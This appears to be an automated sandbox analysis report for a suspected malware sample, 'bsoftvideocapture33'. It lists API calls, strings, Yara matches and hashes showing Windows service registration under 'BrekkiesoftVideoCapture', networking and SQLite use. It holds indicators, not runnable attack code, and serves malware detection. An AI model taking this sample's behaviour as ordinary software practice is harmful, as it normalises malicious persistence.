                                                                                                                                        • String ID: ATTACH '' AS vacuum_db;$ATTACH ':memory:' AS vacuum_db;$BEGIN;$INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)$PRAGMA vacuum_db.synchronous=OFF$SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' $SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0$SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'$SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' $SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';$SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                                                                                                                                        • API String ID: 632333372-52344843
                                                                                                                                        • Opcode ID: d52540ff3cd5a889f8fcb2175177c5c293f6bf3e96b3409faf11301466b535e5
                                                                                                                                        • Instruction ID: 17dae18cb22bd420f764556e48f7e631e7f528851c991f2db59136dec61311d4
                                                                                                                                        • Opcode Fuzzy Hash: d52540ff3cd5a889f8fcb2175177c5c293f6bf3e96b3409faf11301466b535e5
                                                                                                                                        • Instruction Fuzzy Hash: 1202F6B0A046299BDB2ACF18C88179EB7FABF65304F1081D9E858AB355D771DE81CF41
                                                                                                                                        APIs
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02C01D11
                                                                                                                                        • GetLastError.KERNEL32 ref: 02C01D23
                                                                                                                                          • Part of subcall function 02C01712: __EH_prolog.LIBCMT ref: 02C01717
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02C01D59
                                                                                                                                        • GetLastError.KERNEL32 ref: 02C01D6B
                                                                                                                                        • __beginthreadex.LIBCMT ref: 02C01DB1
                                                                                                                                        • GetLastError.KERNEL32 ref: 02C01DC6
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02C01DDD
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02C01DEC
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C01E14
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02C01E1B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                                                                                                        • String ID: thread$thread.entry_event$thread.exit_event
                                                                                                                                        • API String ID: 831262434-3017686385
                                                                                                                                        • Opcode ID: 29cddc1393703c6b3df7915938fafff75e991105983639e2ce39dc4f92fb6808
                                                                                                                                        • Instruction ID: eaba44e4b84dcb639aef2fca9743c5a47c6063c795ab10696089bb13474bee9e
                                                                                                                                        • Opcode Fuzzy Hash: 29cddc1393703c6b3df7915938fafff75e991105983639e2ce39dc4f92fb6808
                                                                                                                                        • Instruction Fuzzy Hash: 06316B719003119FD710EF24C888B2BBBA9FF84760F14492DF9598B295DBB09949CFD2
                                                                                                                                        APIs
                                                                                                                                        • SetServiceStatus.ADVAPI32(0040BE50), ref: 00401A02
                                                                                                                                        • SetEvent.KERNEL32 ref: 00401A0E
                                                                                                                                        • RegisterServiceCtrlHandlerA.ADVAPI32(BrekkiesoftVideoCapture,004019C8), ref: 00401A25
                                                                                                                                        • SetServiceStatus.ADVAPI32(0040BE50), ref: 00401A84
                                                                                                                                        • GetLastError.KERNEL32 ref: 00401A86
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00401A93
                                                                                                                                        • GetLastError.KERNEL32 ref: 00401AB4
                                                                                                                                        • SetServiceStatus.ADVAPI32(0040BE50), ref: 00401AE4
                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00001897,00000000,00000000,00000000), ref: 00401AF0
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00401AF9
                                                                                                                                        • CloseHandle.KERNEL32 ref: 00401B05
                                                                                                                                        • SetServiceStatus.ADVAPI32(0040BE50), ref: 00401B2E
                                                                                                                                        Strings
                                                                                                                                        • BrekkiesoftVideoCapture, xrefs: 00401A20
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Service$Status$CreateErrorEventLast$CloseCtrlHandleHandlerObjectRegisterSingleThreadWait
                                                                                                                                        • String ID: BrekkiesoftVideoCapture
                                                                                                                                        • API String ID: 1078627318-4253525158
                                                                                                                                        • Opcode ID: 7d09e8eb5b8e8689bf8be5551a89009032285b618e14dbce3775e6d4680f83fd
                                                                                                                                        • Instruction ID: fe0e10fd94db48ca2312eac1d7ab5fb7f56e0f11cc9a60428dd088b60b76b330
                                                                                                                                        • Opcode Fuzzy Hash: 7d09e8eb5b8e8689bf8be5551a89009032285b618e14dbce3775e6d4680f83fd
                                                                                                                                        • Instruction Fuzzy Hash: 8531A9B1501384ABD710AF26EF48B967BB8EB95B56B11843AE241B23B1C7F90444CFDC
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 02C024E6
                                                                                                                                        • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 02C024FC
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 02C0250E
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 02C0256D
                                                                                                                                        • SetLastError.KERNEL32(00000000,?,771ADFB0), ref: 02C0257F
                                                                                                                                        • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,771ADFB0), ref: 02C02599
                                                                                                                                        • GetLastError.KERNEL32(?,771ADFB0), ref: 02C025A2
                                                                                                                                        • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C025F0
                                                                                                                                        • InterlockedDecrement.KERNEL32(00000002), ref: 02C0262F
                                                                                                                                        • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02C0268E
                                                                                                                                        • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C02699
                                                                                                                                        • InterlockedExchange.KERNEL32(00000000,00000001), ref: 02C026AD
                                                                                                                                        • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,771ADFB0), ref: 02C026BD
                                                                                                                                        • GetLastError.KERNEL32(?,771ADFB0), ref: 02C026C7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1213838671-0
                                                                                                                                        • Opcode ID: d9fc150f63efa56501d39c3f1e1f614ece4b89a79cd229d5c7dcba23be05ba56
                                                                                                                                        • Instruction ID: 495c33b8d3ab09612313038029fe7a729e0527d7b91df4eadd37ad3a48e34736
                                                                                                                                        • Opcode Fuzzy Hash: d9fc150f63efa56501d39c3f1e1f614ece4b89a79cd229d5c7dcba23be05ba56
                                                                                                                                        • Instruction Fuzzy Hash: 1C614171900209EFCB24DFA4D8D8BAEBBB9FF48354F504519E916E7280DB309A44CFA1
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 02C04608
                                                                                                                                          • Part of subcall function 02C127C5: _malloc.LIBCMT ref: 02C127DD
                                                                                                                                        • htons.WS2_32(?), ref: 02C04669
                                                                                                                                        • htonl.WS2_32(?), ref: 02C0468C
                                                                                                                                        • htonl.WS2_32(00000000), ref: 02C04693
                                                                                                                                        • htons.WS2_32(00000000), ref: 02C04747
                                                                                                                                        • _sprintf.LIBCMT ref: 02C0475D
                                                                                                                                          • Part of subcall function 02C07991: _memmove.LIBCMT ref: 02C079B1
                                                                                                                                        • htons.WS2_32(?), ref: 02C046B0
                                                                                                                                          • Part of subcall function 02C0873C: __EH_prolog.LIBCMT ref: 02C08741
                                                                                                                                          • Part of subcall function 02C0873C: RtlEnterCriticalSection.NTDLL(00000020), ref: 02C087BC
                                                                                                                                          • Part of subcall function 02C0873C: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02C087DA
                                                                                                                                          • Part of subcall function 02C01BA7: __EH_prolog.LIBCMT ref: 02C01BAC
                                                                                                                                          • Part of subcall function 02C01BA7: RtlEnterCriticalSection.NTDLL ref: 02C01BBC
                                                                                                                                          • Part of subcall function 02C01BA7: RtlLeaveCriticalSection.NTDLL ref: 02C01BEA
                                                                                                                                          • Part of subcall function 02C01BA7: RtlEnterCriticalSection.NTDLL ref: 02C01C13
                                                                                                                                          • Part of subcall function 02C01BA7: RtlLeaveCriticalSection.NTDLL ref: 02C01C56
                                                                                                                                          • Part of subcall function 02C0CEF8: __EH_prolog.LIBCMT ref: 02C0CEFD
                                                                                                                                        • htonl.WS2_32(?), ref: 02C0497C
                                                                                                                                        • htonl.WS2_32(00000000), ref: 02C04983
                                                                                                                                        • htonl.WS2_32(00000000), ref: 02C049C8
                                                                                                                                        • htonl.WS2_32(00000000), ref: 02C049CF
                                                                                                                                        • htons.WS2_32(?), ref: 02C049EF
                                                                                                                                        • htons.WS2_32(?), ref: 02C049F9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_memmove_sprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1645262487-0
                                                                                                                                        • Opcode ID: b3cf0c8ea8555968fcf62b232b9347c5c7e5f141c8b1d110776fade641049509
                                                                                                                                        • Instruction ID: 09769188f67d25a31f62e396e0518544ed810b737376b8c67020dae11d598a00
                                                                                                                                        • Opcode Fuzzy Hash: b3cf0c8ea8555968fcf62b232b9347c5c7e5f141c8b1d110776fade641049509
                                                                                                                                        • Instruction Fuzzy Hash: 7B024C71D00259EEEF29DFE4C884BEEBBB9AF08305F10455AE505B7280DB746A48DF61
                                                                                                                                        APIs
                                                                                                                                        • RtlDecodePointer.NTDLL(?), ref: 02C16EF8
                                                                                                                                        • _free.LIBCMT ref: 02C16F11
                                                                                                                                          • Part of subcall function 02C11F84: HeapFree.KERNEL32(00000000,00000000,?,02C14942,00000000,00000104,771B0A60), ref: 02C11F98
                                                                                                                                          • Part of subcall function 02C11F84: GetLastError.KERNEL32(00000000,?,02C14942,00000000,00000104,771B0A60), ref: 02C11FAA
                                                                                                                                        • _free.LIBCMT ref: 02C16F24
                                                                                                                                        • _free.LIBCMT ref: 02C16F42
                                                                                                                                        • _free.LIBCMT ref: 02C16F54
                                                                                                                                        • _free.LIBCMT ref: 02C16F65
                                                                                                                                        • _free.LIBCMT ref: 02C16F70
                                                                                                                                        • _free.LIBCMT ref: 02C16F94
                                                                                                                                        • RtlEncodePointer.NTDLL(008893E0), ref: 02C16F9B
                                                                                                                                        • _free.LIBCMT ref: 02C16FB0
                                                                                                                                        • _free.LIBCMT ref: 02C16FC6
                                                                                                                                        • _free.LIBCMT ref: 02C16FEE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3064303923-0
                                                                                                                                        • Opcode ID: ed3616f0fed5e5390543bb2ac9528b0acb3a620aba61a19f541aa7d6045d4c27
                                                                                                                                        • Instruction ID: 5692999397d4b0d46c38b1791389c7137dfa5ba767bb14403010de3676f2eb0f
                                                                                                                                        • Opcode Fuzzy Hash: ed3616f0fed5e5390543bb2ac9528b0acb3a620aba61a19f541aa7d6045d4c27
                                                                                                                                        • Instruction Fuzzy Hash: 1121B136D441119FCB349F24F8417457769EB4632532D4F2EE90897200CB7B9964EF90
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                                                                                          • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                                                                                          • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                                                                                          • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                                                                                          • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                                                                                          • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                                                                                          • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                                                                                        • sqlite3_malloc.SQLITE3 ref: 60960384
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 609605EA
                                                                                                                                        • sqlite3_result_error_code.SQLITE3 ref: 6096060D
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 60960618
                                                                                                                                        • sqlite3_result_text.SQLITE3 ref: 6096063C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_free$sqlite3_result_error_code$sqlite3_bind_int64sqlite3_mallocsqlite3_mprintfsqlite3_resetsqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                                                                                        • String ID: offsets
                                                                                                                                        • API String ID: 463808202-2642679573
                                                                                                                                        • Opcode ID: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                                                                                        • Instruction ID: 1101d6838161b799219a4b3d5732631e197d31251dd2d8b91c34f261bd2faa79
                                                                                                                                        • Opcode Fuzzy Hash: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                                                                                        • Instruction Fuzzy Hash: 72C1D374A183198FDB14CF59C580B8EBBF2BFA8314F2085A9E849AB354D734D985CF52
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 02C04D8B
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(02C34FD0), ref: 02C04DB7
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(02C34FD0), ref: 02C04DC3
                                                                                                                                          • Part of subcall function 02C04BED: __EH_prolog.LIBCMT ref: 02C04BF2
                                                                                                                                          • Part of subcall function 02C04BED: InterlockedExchange.KERNEL32(?,00000000), ref: 02C04CF2
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(02C34FD0), ref: 02C04E93
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(02C34FD0), ref: 02C04E99
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(02C34FD0), ref: 02C04EA0
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(02C34FD0), ref: 02C04EA6
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(02C34FD0), ref: 02C050A7
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(02C34FD0), ref: 02C050AD
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(02C34FD0), ref: 02C050B8
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(02C34FD0), ref: 02C050C1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2062355503-0
                                                                                                                                        • Opcode ID: bfd96be15794319f011206e81ad9a05d7cb9bf1c17591c1a67a78f29eaa78251
                                                                                                                                        • Instruction ID: fe7d68f746445af58f343d5513be838eff9f15af374bb05970c43f5ec42ee933
                                                                                                                                        • Opcode Fuzzy Hash: bfd96be15794319f011206e81ad9a05d7cb9bf1c17591c1a67a78f29eaa78251
                                                                                                                                        • Instruction Fuzzy Hash: C6B17B31D0025DDFEF25DFA0D880BEEBBB9AF04318F14405AE415B6280DBB55A49CFA1
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A3C1
                                                                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6091A3D6
                                                                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A3E4
                                                                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6091A416
                                                                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A424
                                                                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6091A43A
                                                                                                                                        • sqlite3_result_text.SQLITE3 ref: 6091A5A2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_result_text
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2903785150-0
                                                                                                                                        • Opcode ID: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                                                                                        • Instruction ID: 050d84d3da0bd462ad4a4a15df4a38950001fc66f1de33c81d7c2c3a6f7146e7
                                                                                                                                        • Opcode Fuzzy Hash: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                                                                                        • Instruction Fuzzy Hash: 8971D074E086599FCF00DFA8C88069DBBF2BF59314F1485AAE855AB304E734EC85CB91
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 02C03428
                                                                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 02C0346B
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02C03472
                                                                                                                                        • GetLastError.KERNEL32 ref: 02C03486
                                                                                                                                        • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02C034D7
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(00000018), ref: 02C034ED
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(00000018), ref: 02C03518
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
                                                                                                                                        • String ID: CancelIoEx$KERNEL32
                                                                                                                                        • API String ID: 2902213904-434325024
                                                                                                                                        • Opcode ID: ad024e4ccceb092730c7fc8723a4c39994f962de0a87529f806a03c60235d0fe
                                                                                                                                        • Instruction ID: 8e19b60b95b29ba3df123316406b0cb7872903974986295c4e976a599683f965
                                                                                                                                        • Opcode Fuzzy Hash: ad024e4ccceb092730c7fc8723a4c39994f962de0a87529f806a03c60235d0fe
                                                                                                                                        • Instruction Fuzzy Hash: 11318FB1900355DFDB11EFA4D894B6A7BF9FF89350F0145A9E9059B280CB749904CFA1
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                                                                        • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091264D
                                                                                                                                        • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912662
                                                                                                                                        • sqlite3_malloc.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091273E
                                                                                                                                        • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912753
                                                                                                                                        • sqlite3_os_init.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912758
                                                                                                                                        • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912803
                                                                                                                                        • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091280E
                                                                                                                                        • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091282A
                                                                                                                                        • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091283F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_freesqlite3_mallocsqlite3_mutex_freesqlite3_os_init
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3556715608-0
                                                                                                                                        • Opcode ID: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                                                                                                        • Instruction ID: 37d7613b282c24208f37f95ee69ae3eaf9c0527d79975c213f2f38643f7f707f
                                                                                                                                        • Opcode Fuzzy Hash: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                                                                                                        • Instruction Fuzzy Hash: FEA14A71A2C215CBEB009F69CC843257FE7B7A7318F10816DD415AB2A0E7B9DC95EB11
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00403EF1,?,Microsoft Visual C++ Runtime Library,00012010,?,00408574,?,004085C4,?,?,?,Runtime Error!Program: ), ref: 004060FA
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00406112
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00406123
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00406130
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                                                        • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                                                                        • API String ID: 2238633743-4044615076
                                                                                                                                        • Opcode ID: ea984a93ff560351788ad20c29eb99aad13fd5e912c3d8ef3fdbbe59f23fd654
                                                                                                                                        • Instruction ID: df2af2c5de4b25a8c2909cb75962e634be7cb6d7c0604ae4ccb63621d4521f2f
                                                                                                                                        • Opcode Fuzzy Hash: ea984a93ff560351788ad20c29eb99aad13fd5e912c3d8ef3fdbbe59f23fd654
                                                                                                                                        • Instruction Fuzzy Hash: 23018435700211DBC7109FB59FC0A177AE99A99780702053FB686FA2A3DA7888158FAD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $ AND $%s USING %sINDEX %s%s$%s USING AUTOMATIC %sINDEX%.0s%s$)><$0$ANY($COVERING $SCAN$SEARCH$rowid
                                                                                                                                        • API String ID: 0-780898
                                                                                                                                        • Opcode ID: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
